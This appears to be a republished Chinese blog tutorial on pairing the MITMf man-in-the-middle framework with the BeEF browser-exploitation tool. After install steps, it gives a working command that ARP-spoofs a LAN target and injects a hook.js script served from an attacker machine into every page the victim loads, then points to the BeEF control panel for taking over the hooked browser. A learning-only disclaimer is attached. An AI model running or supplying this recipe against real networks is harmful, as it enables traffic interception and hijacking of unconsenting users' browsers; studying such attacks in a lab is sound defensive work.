Mitmf中间人攻击框架与beef结合,XSS一把
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Mitmf中间人攻击框架与beef结合,XSS一把相关的知识,希望对你有一定的参考价值。
本文章中所使用的方法只是未了学习教育,如果读者使用该方法用于恶意用途,造成的法律后果,读者自负;
网站:
https://github.com/byt3bl33d3r/MITMf
安装Mitmf:
1. 在Debian下安装依赖包
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
2. 安装mitmf框架
apt-get install mitmf
注意:不过这样安装完成后 mitmf 依然无法正常使用它的一些功能。因为缺少了 twisted 的版本兼容性。我们来安装适合 mitmf 的 twisted 。如果你已经安装过,那么先卸载之前的版本。输入命令:
pip uninstall twisted kali linux 2017.3是不需要卸载但是需要重新安装下边的内容:
并用 wget 命令进行下载。
wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
进行中间人XSS
1. 启动beef
cd /usr/share/beef-xss/
./beef
2. 利用mitmf进行中间人XSS攻击
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.103 –inject –sj-url http://192.168.1.104:3000/hook.js 执行后,只要用户对任何网站进行对应访问,访问页面中就被插入js代码;接下来就可以使用beef进行对应控制;
查看网页源代码
访问 127.0.0.1:3000/ui/panel
接下来就可以使用beef神器对这个windows进行很多有意思的实验。
以上是关于Mitmf中间人攻击框架与beef结合,XSS一把的主要内容,如果未能解决你的问题,请参考以下文章